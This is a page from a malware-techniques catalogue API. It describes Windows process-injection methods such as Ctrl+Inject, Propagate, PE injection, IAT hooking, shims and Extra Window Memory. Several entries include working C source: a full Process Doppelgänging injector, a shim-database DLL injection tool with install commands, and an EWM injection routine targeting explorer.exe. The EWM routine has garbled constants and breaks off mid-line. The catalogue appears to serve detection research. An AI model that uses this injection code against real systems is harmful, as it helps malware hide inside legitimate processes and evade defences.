GET /api/techniques/?page=2
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 157,
    "next": "https://search.unprotect.it/api/techniques/?page=3",
    "previous": "https://search.unprotect.it/api/techniques/",
    "results": [
        {
            "name": "Ctrl+Inject",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "This technique uses a callback function for Control signal handlers to inject the malicious code. Each time a control signal, such as Ctrl+C, is received by a process the system creates a new thread to execute the function. The thread is created by legitimate process “csrss.exe” in the system, rendering the detection more difficult.\r\n\r\nBy using this technique, it is possible to inject a code each time a console process receives a control signal. To do that, the technique needs to bypass some Windows protections such as Pointer Encoding and Control Flow Guard. Pointer encoding is used to encode a pointer and avoid pointer corruption. The technique reproduces the encoding to appear legitimate. Control Flow Guard is a security mechanism to prevent memory corruption such as buffer overflow. The technique will simply use the API SetProcessValidCallTargets to validate the call target. Thus, by triggering Ctrl+C the injected code is executed.",
            "resources": "https://blog.ensilo.com/ctrl-inject",
            "tags": "csrss",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Propagate",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "This technique also abuses internal Windows functionality. In this case the technique uses Window Subclassing. When an application creates a window on the system, some information about this specific window are stored. If the system needs to send a message to this window, it makes use of this specific information to correctly target the message. Subclassing allows the interception of this specific message in order to modify or monitor the behavior of the window. \r\n\r\nWhen a window is subclassed, new properties are added (UxSubclassInfo, CC32SubclassInfo); internal structure will then use these properties. Basically, the technique will inject a buffer containing the shellcode into the target process, then modify the structure used by the specific properties to point to the payload. Finally, modify the property of the window. When a message is sent to the window the shellcode is executed.",
            "resources": "http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/",
            "tags": "propagate",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Process Doppelgänging",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "This technique leverages the Transactional NTFS functionality in Windows. This functionality helps maintain data integrity during an unexpected error. For example, when an application needs to write or modify a file, if an error is triggered mid-write, the data can be corrupted. To avoid this kind of behavior, an application can open the file in a transactional mode to perform the modification, then commit the modification, avoiding any corruption. The modification either completes successfully or does not begin. \r\nProcess Doppelgänging abuses this functionality to overwrite a legitimate file with a malicious file, resulting in a process injection. The malicious file will be created inside a transaction then committed to the legitimate file, then executed.",
            "resources": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf",
            "tags": "Doppelgänging",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/2/",
                    "author": "https://search.unprotect.it/api/snippet_authors/3/",
                    "technique": "https://search.unprotect.it/api/techniques/119/",
                    "description": "",
                    "plain_code": "// Ref = src\r\n// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf\r\n//\r\n// Credits:\r\n//  Vyacheslav Rusakov @swwwolf\r\n//  Tom Bonner @thomas_bonner\r\n//\r\n\r\n#include <Windows.h>\r\n#include <ntstatus.h>\r\n#include \"ntos.h\"\r\n\r\nVOID ProcessDoppelgänging(\r\n    _In_ LPWSTR lpTargetApp,\r\n    _In_ LPWSTR lpPayloadApp)\r\n{\r\n    BOOL bCond = FALSE;\r\n    NTSTATUS status;\r\n    HANDLE hTransaction = NULL, hTransactedFile = INVALID_HANDLE_VALUE, hFile = INVALID_HANDLE_VALUE;\r\n    HANDLE hSection = NULL, hProcess = NULL, hThread = NULL;\r\n    LARGE_INTEGER fsz;\r\n    ULONG ReturnLength = 0;\r\n    ULONG_PTR EntryPoint = 0, ImageBase = 0;\r\n    PVOID Buffer = NULL, MemoryPtr = NULL;\r\n    SIZE_T sz = 0;\r\n    PEB *Peb;\r\n\r\n    PROCESS_BASIC_INFORMATION pbi;\r\n\r\n    PRTL_USER_PROCESS_PARAMETERS ProcessParameters = NULL;\r\n\r\n    OBJECT_ATTRIBUTES obja;\r\n    UNICODE_STRING    ustr;\r\n\r\n    BYTE temp[0x1000];\r\n\r\n    do {\r\n        RtlSecureZeroMemory(&temp, sizeof(temp));\r\n\r\n        //\r\n        // Create TmTx transaction object.\r\n        //\r\n        InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\r\n        status = NtCreateTransaction(&hTransaction,\r\n            TRANSACTION_ALL_ACCESS,\r\n            &obja,\r\n            NULL,\r\n            NULL,\r\n            0,\r\n            0,\r\n            0,\r\n            NULL,\r\n            NULL);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateTransaction fail\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Open target file for transaction.\r\n        //\r\n        hTransactedFile = CreateFileTransacted(lpTargetApp,\r\n            GENERIC_WRITE | GENERIC_READ,\r\n            0,\r\n            NULL,\r\n            OPEN_EXISTING,\r\n            FILE_ATTRIBUTE_NORMAL,\r\n            NULL,\r\n            hTransaction,\r\n            NULL,\r\n            NULL);\r\n\r\n        if (hTransactedFile == INVALID_HANDLE_VALUE) {\r\n            OutputDebugString(L\"CreateFileTransacted fail\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Open file payload.\r\n        //\r\n        hFile = CreateFile(lpPayloadApp,\r\n            GENERIC_READ,\r\n            0,\r\n            NULL,\r\n            OPEN_EXISTING,\r\n            FILE_ATTRIBUTE_NORMAL,\r\n            NULL);\r\n        if (hFile == INVALID_HANDLE_VALUE) {\r\n            OutputDebugString(L\"CreateFile(target) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Query payload file size.\r\n        //\r\n        if (!GetFileSizeEx(hFile, &fsz)) {\r\n            OutputDebugString(L\"GetFileSizeEx(target) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Allocate buffer for payload file.\r\n        //\r\n        Buffer = NULL;\r\n        sz = (SIZE_T)fsz.LowPart;\r\n        status = NtAllocateVirtualMemory(NtCurrentProcess(),\r\n            &Buffer,\r\n            0,\r\n            &sz,\r\n            MEM_COMMIT | MEM_RESERVE,\r\n            PAGE_READWRITE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtAllocateVirtualMemory(fsz.LowPart) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Read payload file to the buffer.\r\n        //\r\n        if (!ReadFile(hFile, Buffer, fsz.LowPart, &ReturnLength, NULL)) {\r\n            OutputDebugString(L\"ReadFile(hFile, Buffer) failed\");\r\n            break;\r\n        }\r\n\r\n        CloseHandle(hFile);\r\n        hFile = INVALID_HANDLE_VALUE;\r\n\r\n        //\r\n        // Write buffer into transaction.\r\n        //\r\n        if (!WriteFile(hTransactedFile, Buffer, fsz.LowPart, &ReturnLength, NULL)) {\r\n            OutputDebugString(L\"WriteFile(hTransactedFile, Buffer) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Create section from transacted file.\r\n        //\r\n        status = NtCreateSection(&hSection,\r\n            SECTION_ALL_ACCESS,\r\n            NULL,\r\n            0,\r\n            PAGE_READONLY,\r\n            SEC_IMAGE,\r\n            hTransactedFile);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateSection(hTransactedFile) failed\");\r\n            break;\r\n        }\r\n\r\n        status = NtRollbackTransaction(hTransaction, TRUE);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtRollbackTransaction(hTransaction) failed\");\r\n            break;\r\n        }\r\n\r\n        NtClose(hTransaction);\r\n        hTransaction = NULL;\r\n\r\n        CloseHandle(hTransactedFile);\r\n        hTransactedFile = INVALID_HANDLE_VALUE;\r\n\r\n        //\r\n        // Create process object with transacted section.\r\n        //\r\n        //\r\n        // Warning: due to MS brilliant coding skills (NULL ptr dereference) \r\n        //          this call will trigger BSOD on Windows 10 prior to RS3.\r\n        //\r\n        hProcess = NULL;\r\n        status = NtCreateProcessEx(&hProcess,\r\n            PROCESS_ALL_ACCESS,\r\n            NULL,\r\n            NtCurrentProcess(),\r\n            PS_INHERIT_HANDLES,\r\n            hSection,\r\n            NULL,\r\n            NULL,\r\n            FALSE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateProcessEx(hSection) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Query payload file entry point value.\r\n        //\r\n        status = NtQueryInformationProcess(hProcess,\r\n            ProcessBasicInformation,\r\n            &pbi,\r\n            sizeof(PROCESS_BASIC_INFORMATION),\r\n            &ReturnLength);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtQueryInformationProcess failed\");\r\n            break;\r\n        }\r\n\r\n        status = NtReadVirtualMemory(hProcess, pbi.PebBaseAddress, &temp, 0x1000, &sz);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtReadVirtualMemory failed\");\r\n            break;\r\n        }\r\n\r\n        EntryPoint = (ULONG_PTR)RtlImageNtHeader(Buffer)->OptionalHeader.AddressOfEntryPoint;\r\n        EntryPoint += (ULONG_PTR)((PPEB)temp)->ImageBaseAddress;\r\n\r\n        //\r\n        // Create process parameters block.\r\n        //\r\n        //RtlInitUnicodeString(&ustr, L\"C:\\\\windows\\\\system32\\\\svchost.exe\");\r\n        RtlInitUnicodeString(&ustr, lpTargetApp);\r\n        status = RtlCreateProcessParametersEx(&ProcessParameters,\r\n            &ustr,\r\n            NULL,\r\n            NULL,\r\n            &ustr,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            RTL_USER_PROC_PARAMS_NORMALIZED);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"RtlCreateProcessParametersEx failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Allocate memory in target process and write process parameters block.\r\n        //\r\n        sz = ProcessParameters->EnvironmentSize + ProcessParameters->MaximumLength;\r\n        MemoryPtr = ProcessParameters;\r\n\r\n        status = NtAllocateVirtualMemory(hProcess,\r\n            &MemoryPtr,\r\n            0,\r\n            &sz,\r\n            MEM_RESERVE | MEM_COMMIT,\r\n            PAGE_READWRITE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtAllocateVirtualMemory(ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        sz = 0;\r\n        status = NtWriteVirtualMemory(hProcess,\r\n            ProcessParameters,\r\n            ProcessParameters,\r\n            ProcessParameters->EnvironmentSize + ProcessParameters->MaximumLength,\r\n            &sz);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtWriteVirtualMemory(ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Update PEB->ProcessParameters pointer to newly allocated block.\r\n        //\r\n        Peb = pbi.PebBaseAddress;\r\n        status = NtWriteVirtualMemory(hProcess,\r\n            &Peb->ProcessParameters,\r\n            &ProcessParameters,\r\n            sizeof(PVOID),\r\n            &sz);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtWriteVirtualMemory(Peb->ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Create primary thread.\r\n        //\r\n        hThread = NULL;\r\n        status = NtCreateThreadEx(&hThread,\r\n            THREAD_ALL_ACCESS,\r\n            NULL,\r\n            hProcess,\r\n            (LPTHREAD_START_ROUTINE)EntryPoint,\r\n            NULL,\r\n            FALSE,\r\n            0,\r\n            0,\r\n            0,\r\n            NULL);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateThreadEx(EntryPoint) failed\");\r\n            break;\r\n        }\r\n\r\n    } while (bCond);\r\n\r\n    if (hTransaction)\r\n        NtClose(hTransaction);\r\n    if (hSection)\r\n        NtClose(hSection);\r\n    if (hProcess)\r\n        NtClose(hProcess);\r\n    if (hThread)\r\n        NtClose(hThread);\r\n    if (hTransactedFile != INVALID_HANDLE_VALUE)\r\n        CloseHandle(hTransactedFile);\r\n    if (hFile != INVALID_HANDLE_VALUE)\r\n        CloseHandle(hFile);\r\n    if (Buffer != NULL) {\r\n        sz = 0;\r\n        NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &sz, MEM_RELEASE);\r\n    }\r\n    if (ProcessParameters) {\r\n        RtlDestroyProcessParameters(ProcessParameters);\r\n    }\r\n}\r\n\r\nvoid main()\r\n{\r\n    ProcessDoppelgänging(L\"C:\\\\test\\\\target.exe\", L\"C:\\\\test\\\\payload.exe\");\r\n    ExitProcess(0);\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "name": "PE Injection",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Instead of passing the address of the LoadLibrary, malware can copy its malicious code into an existing open process and cause it to execute (either via a small shellcode, or by calling CreateRemoteThread). One advantage of PE injection over the LoadLibrary technique is that the malware does not have to drop a malicious DLL on the disk. Similar to the first technique, the malware allocates memory in a host process (e.g. VirtualAllocEx), and instead of writing a “DLL path” it writes its malicious code by calling WriteProcessMemory. However, the obstacle with this approach is the change of the base address of the copied image. When a malware injects its PE into another process it will have a new base address which is unpredictable, requiring it to dynamically recompute the fixed addresses of its PE. To overcome this, the malware needs to find its relocation table address in the host process and resolve the absolute addresses of the copied image by looping through its relocation descriptors.",
            "resources": "http://blog.sevagas.com/?PE-injection-explained",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "IAT Hooking",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "IAT hooking is a way to run malicious code by modifying the Import Address Table of a specific executable. Consisting to replace one legitimate function from imported DLL by a malicious one. IAT hooking and inline hooking are generally known as userland rootkits. IAT hooking is a technique that malware uses to change the import address table. When a legitimate application calls an API located in a DLL, the replaced function is executed instead of the original one. In contrast, with inline hooking, malware modifies the API function itself.",
            "resources": "https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108",
            "tags": "iat",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Injection using Shims",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Microsoft provides Shims to developers mainly for backward compatibility. Shims allow developers to apply fixes to their programs without the need of rewriting code. By leveraging shims, developers can tell the operating system how to handle their application. Shims are essentially a way of hooking into APIs and targeting specific executables. Malware can take advantage of shims to target an executable for both persistence and injection. Windows runs the Shim Engine when it loads a binary to check for shimming databases in order to apply the appropriate fixes.",
            "resources": "https://www.andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/\r\nhttps://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf",
            "tags": "shims",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/2/",
                    "author": "https://search.unprotect.it/api/snippet_authors/3/",
                    "technique": "https://search.unprotect.it/api/techniques/116/",
                    "description": "",
                    "plain_code": "/*\r\nSource: https://gist.github.com/w4kfu/95a87764db7029e03f09d78f7273c4f4\r\n-------- dllinjshim.cpp --------\r\n> cl /Fe:dllinjshim.exe dllinjshim.cpp\r\n> dllinjshim.exe\r\n> sdbinst moo.sdb\r\n/!\\ On Windows 10 there is a new function `SdbIsKnownShimDll` called \r\nin `SdbGetDllPath` which will check the DLL name against the following list:\r\n- \"AcGenral.dll\"\r\n- \"AcLayers.dll\"\r\n- \"AcRes.dll\"\r\n- \"AcSpecfc.dll\"\r\n- \"AcWinRT.dll\"\r\n- \"acwow64.dll\"\r\n- \"AcXtrnal.dll\"\r\n- \"KeyboardFilterShim.dll\"\r\n- \"MasterShim.dll\"\r\n- \"depdetct\"\r\n- \"uacdetct\"\r\n- \"luadgmgt.dll\"\r\n- \"luapriv.dll\"\r\n- \"EMET.dll\"\r\n- \"EMET64.dll\"\r\n- \"LogExts.dll\"\r\n- \"LogShim.dll\"\r\n------------------------------------\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n#define INJECTED_DLL_NAME   L\"moo.dll\"\r\n\r\n#define EXECUTABLE_NAME     L\"calc.exe\"\r\n#define OS_PLATFORM         4                   /* 0x1 : 32-bit ; 0x04 : 64-bit */\r\n\r\n\r\n#define TAGID_NULL          0\r\n\r\n#define TAG_TYPE_LIST       0x7000\r\n#define TAG_DATABASE        (0x1 | TAG_TYPE_LIST)\r\n#define TAG_LIBRARY         (0x2 | TAG_TYPE_LIST)\r\n#define TAG_INEXCLUDE       (0x3 | TAG_TYPE_LIST)\r\n#define TAG_SHIM            (0x4 | TAG_TYPE_LIST)\r\n#define TAG_EXE             (0x7 | TAG_TYPE_LIST)\r\n#define TAG_MATCHING_FILE   (0x8 | TAG_TYPE_LIST)\r\n#define TAG_SHIM_REF        (0x9 | TAG_TYPE_LIST)\r\n\r\n#define TAG_TYPE_DWORD      0x4000\r\n#define TAG_OS_PLATFORM     (0x23| TAG_TYPE_DWORD)\r\n\r\n#define TAG_TYPE_STRINGREF  0x6000\r\n#define TAG_NAME            (0x1 | TAG_TYPE_STRINGREF)\r\n#define TAG_MODULE          (0x3 | TAG_TYPE_STRINGREF)\r\n#define TAG_APP_NAME        (0x6 | TAG_TYPE_STRINGREF)\r\n#define TAG_DLLFILE         (0xA | TAG_TYPE_STRINGREF)\r\n\r\n#define TAG_TYPE_BINARY     0x9000\r\n#define TAG_EXE_ID          (0x4 | TAG_TYPE_BINARY)\r\n#define TAG_DATABASE_ID     (0x7 | TAG_TYPE_BINARY)\r\n\r\n#define TAG_TYPE_NULL       0x1000\r\n#define TAG_INCLUDE         (0x1 | TAG_TYPE_NULL)\r\n\r\ntypedef enum _PATH_TYPE {\r\n    DOS_PATH,\r\n    NT_PATH\r\n} PATH_TYPE;\r\n\r\ntypedef HANDLE PDB;\r\ntypedef DWORD TAG;\r\ntypedef DWORD INDEXID;\r\ntypedef DWORD TAGID;\r\n\r\ntypedef struct tagATTRINFO {\r\n    TAG  tAttrID;\r\n    DWORD dwFlags;\r\n    union {\r\n        ULONGLONG ullAttr;\r\n        DWORD   dwAttr;\r\n        TCHAR   *lpAttr;\r\n    };\r\n} ATTRINFO, *PATTRINFO;\r\n\r\ntypedef PDB (WINAPI *SdbCreateDatabasePtr)(LPCWSTR, PATH_TYPE);\r\ntypedef VOID (WINAPI *SdbCloseDatabaseWritePtr)(PDB);\r\ntypedef TAGID (WINAPI *SdbBeginWriteListTagPtr)(PDB, TAG);\r\ntypedef BOOL (WINAPI *SdbEndWriteListTagPtr)(PDB, TAGID);\r\ntypedef BOOL (WINAPI *SdbWriteStringTagPtr)(PDB, TAG, LPCWSTR);\r\ntypedef BOOL (WINAPI *SdbWriteDWORDTagPtr)(PDB, TAG, DWORD);\r\ntypedef BOOL (WINAPI *SdbWriteBinaryTagPtr)(PDB, TAG, PBYTE, DWORD);\r\ntypedef BOOL (WINAPI *SdbWriteNULLTagPtr)(PDB, TAG);\r\n\r\ntypedef struct _APPHELP_API {\r\n    SdbCreateDatabasePtr         SdbCreateDatabase;\r\n    SdbCloseDatabaseWritePtr     SdbCloseDatabaseWrite;\r\n    SdbBeginWriteListTagPtr      SdbBeginWriteListTag;\r\n    SdbEndWriteListTagPtr        SdbEndWriteListTag;\r\n    SdbWriteStringTagPtr         SdbWriteStringTag;\r\n    SdbWriteDWORDTagPtr          SdbWriteDWORDTag;\r\n    SdbWriteBinaryTagPtr         SdbWriteBinaryTag;\r\n    SdbWriteNULLTagPtr           SdbWriteNULLTag;\r\n} APPHELP_API, *PAPPHELP_API;\r\n\r\nBOOL static LoadAppHelpFunctions(HMODULE hAppHelp, PAPPHELP_API pAppHelp) {\r\n    if (!(pAppHelp->SdbBeginWriteListTag = (SdbBeginWriteListTagPtr)GetProcAddress(hAppHelp, \"SdbBeginWriteListTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbBeginWriteListTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbCloseDatabaseWrite = (SdbCloseDatabaseWritePtr)GetProcAddress(hAppHelp, \"SdbCloseDatabaseWrite\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbCloseDatabaseWrite\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbCreateDatabase = (SdbCreateDatabasePtr)GetProcAddress(hAppHelp, \"SdbCreateDatabase\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbCreateDatabase\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbEndWriteListTag = (SdbEndWriteListTagPtr)GetProcAddress(hAppHelp, \"SdbEndWriteListTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbEndWriteListTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbWriteBinaryTag = (SdbWriteBinaryTagPtr)GetProcAddress(hAppHelp, \"SdbWriteBinaryTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteBinaryTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbWriteDWORDTag = (SdbWriteDWORDTagPtr)GetProcAddress(hAppHelp, \"SdbWriteDWORDTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteDWORDTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbWriteStringTag = (SdbWriteStringTagPtr)GetProcAddress(hAppHelp, \"SdbWriteStringTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteStringTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    if (!(pAppHelp->SdbWriteNULLTag = (SdbWriteNULLTagPtr)GetProcAddress(hAppHelp, \"SdbWriteNULLTag\"))) {\r\n        fprintf(stderr, \"[-] GetProcAddress(..., \\\"SdbWriteNULLTag\\\")\\n\");\r\n        return FALSE;\r\n    }\r\n    return TRUE;\r\n}\r\n\r\nBOOL static DoStuff(PAPPHELP_API pAppHelp)\r\n{\r\n    PDB db = NULL;\r\n    TAGID tIdDatabase;\r\n    TAGID tIdLibrary;\r\n    TAGID tIdShim;\r\n    TAGID tIdInexclude;\r\n    TAGID tIdExe;\r\n    TAGID tIdMatchingFile;\r\n    TAGID tIdShimRef;\r\n    \r\n    db = pAppHelp->SdbCreateDatabase(L\"moo.sdb\", DOS_PATH);\r\n    if (db == NULL) {\r\n        fprintf(stderr, \"[-] SdbCreateDatabase failed : %lu\\n\", GetLastError());\r\n        return FALSE;\r\n    }\r\n    tIdDatabase = pAppHelp->SdbBeginWriteListTag(db, TAG_DATABASE);\r\n    pAppHelp->SdbWriteDWORDTag(db, TAG_OS_PLATFORM, OS_PLATFORM);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"moo_Database\");\r\n    pAppHelp->SdbWriteBinaryTag(db, TAG_DATABASE_ID, \"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\", 0x10);\r\n    tIdLibrary = pAppHelp->SdbBeginWriteListTag(db, TAG_LIBRARY);\r\n    tIdShim = pAppHelp->SdbBeginWriteListTag(db, TAG_SHIM);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"moo_Shim\");\r\n    pAppHelp->SdbWriteStringTag(db, TAG_DLLFILE, INJECTED_DLL_NAME);\r\n    tIdInexclude = pAppHelp->SdbBeginWriteListTag(db, TAG_INEXCLUDE);\r\n    pAppHelp->SdbWriteNULLTag(db, TAG_INCLUDE);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_MODULE, L\"*\");\r\n    pAppHelp->SdbEndWriteListTag(db, tIdInexclude);\r\n    pAppHelp->SdbEndWriteListTag(db, tIdShim);\r\n    pAppHelp->SdbEndWriteListTag(db, tIdLibrary);\r\n    tIdExe = pAppHelp->SdbBeginWriteListTag(db, TAG_EXE);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_NAME, EXECUTABLE_NAME);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_APP_NAME, L\"moo_Apps\");\r\n    pAppHelp->SdbWriteBinaryTag(db, TAG_EXE_ID, \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\", 0x10);\r\n    tIdMatchingFile = pAppHelp->SdbBeginWriteListTag(db, TAG_MATCHING_FILE);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"*\");\r\n    pAppHelp->SdbEndWriteListTag(db, tIdMatchingFile);\r\n    tIdShimRef = pAppHelp->SdbBeginWriteListTag(db, TAG_SHIM_REF);\r\n    pAppHelp->SdbWriteStringTag(db, TAG_NAME, L\"moo_Shim\");\r\n    pAppHelp->SdbEndWriteListTag(db, tIdShimRef);\r\n    pAppHelp->SdbEndWriteListTag(db, tIdExe);\r\n    pAppHelp->SdbEndWriteListTag(db, tIdDatabase);\r\n    pAppHelp->SdbCloseDatabaseWrite(db);\r\n    return TRUE;\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n    APPHELP_API api = {0};\r\n    HMODULE hAppHelp = NULL;\r\n    \r\n    hAppHelp = LoadLibraryA(\"apphelp.dll\");\r\n    if (hAppHelp == NULL) {\r\n        fprintf(stderr, \"[-] LoadLibrary failed %lu\\n\", GetLastError());\r\n        return 1;\r\n    }\r\n    if (LoadAppHelpFunctions(hAppHelp, &api) == FALSE) {\r\n        printf(\"[-] Failed to load apphelp api %lu!\\n\", GetLastError());\r\n        return 1;\r\n    }\r\n    DoStuff(&api);\r\n    return 0;\r\n}\r\nmoo.cpp\r\n/*\r\n-------- moo.cpp --------\r\n> cl /LD /Fe:moo.dll moo.cpp\r\n> copy moo.dll \"C:\\Windows\\AppPatch\\AppPatch64\\moo.dll\"\r\n-------------------------\r\n*/\r\n\r\n#define EXPORT_FUNC extern \"C\" __declspec(dllexport)\r\n\r\nEXPORT_FUNC int GetHookAPIs(PVOID a, PVOID b, PVOID c)\r\n{\r\n    return 0x01; \r\n}\r\n\r\nEXPORT_FUNC int NotifyShims(PVOID a, PVOID b)\r\n{\r\n    return 0x01; \r\n}\r\n\r\nBOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)\r\n{\r\n    UNREFERENCED_PARAMETER(hinstDLL);\r\n    UNREFERENCED_PARAMETER(lpReserved);\r\n\r\n    if (fdwReason == DLL_PROCESS_ATTACH) {\r\n        return TRUE;\r\n    }\r\n    return TRUE;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "name": "Extra Window Memory Injection",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). \r\n\r\nRegistration of new windows classes can include a request for up to 40 bytes of Extra Window Memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value.\r\n\r\nAdversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.",
            "resources": "https://www.crowdstrike.com/blog/through-window-creative-code-invocation/\r\nhttps://modexp.wordpress.com/2018/08/26/process-injection-ctray/",
            "tags": "",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/2/",
                    "author": "https://search.unprotect.it/api/snippet_authors/6/",
                    "technique": "https://search.unprotect.it/api/techniques/115/",
                    "description": "",
                    "plain_code": "LRESULT CALLBACK WndProc(HWND hWnd, UINT uMsg,\r\n    WPARAM wParam, LPARAM lParam)\r\n{\r\n    // igone messages other than WM_CLOSE\r\n    if (uMsg != VM_CLOSE) return 0;\r\n    WinExec_t pWinExec;\r\n    DWORD   szWinExec[2];\r\n            szCalc[2];\r\n    \r\n    // WinExec \r\n    szWinExec[0]=0x456E6957\r\n    szWinExec[1]=0x00636578\r\n    // calc \r\n    szCalc[0]=0x636X6163\r\n    szCalc[1]=0;\r\n    pWinExec = (WinExec_t)xGetProcAddress(szWinExec);\r\n    if(pWinExec != NULL) {\r\n        pWinExec((LPSTR)szCalc, SH_SHOW);\r\n    }\r\n    return 0;\r\n} \r\nFull Function :\r\nLPVOID ewm(LPVOID payload, DWORD payloadSize){\r\n    LPVOID    cs, ds;\r\n    CTray     ct;\r\n    ULONG_PTR ctp;\r\n    HWND      hw;\r\n    HANDLE    hp;\r\n    DWORD     pid;\r\n    SIZE_T    wr;\r\n    \r\n    // 1. Obtain a handle for the shell tray window\r\n    hw = FindWindow(\"Shell_TrayWnd\", NULL);\r\n    // 2. Obtain a process id for explorer.exe\r\n    GetWindowThreadProcessId(hw, &pid);\r\n    \r\n    // 3. Open explorer.exe\r\n    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\r\n    \r\n    // 4. Obtain pointer to the current CTray object\r\n    ctp = GetWindowLongPtr(hw, 0);\r\n    \r\n    // 5. Read address of the current CTray object\r\n    ReadProcessMemory(hp, (LPVOID)ctp, \r\n        (LPVOID)&ct.vTable, sizeof(ULONG_PTR), &wr);\r\n    \r\n    // 6. Read three addresses from the virtual table\r\n    ReadProcessMemory(hp, (LPVOID)ct.vTable, \r\n      (LPVOID)&ct.AddRef, sizeof(ULONG_PTR) * 3, &wr);\r\n    \r\n    // 7. Allocate RWX memory for code\r\n    cs = VirtualAllocEx(hp, NULL, payloadSize, \r\n      MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n    \r\n    // 8. Copy the code to 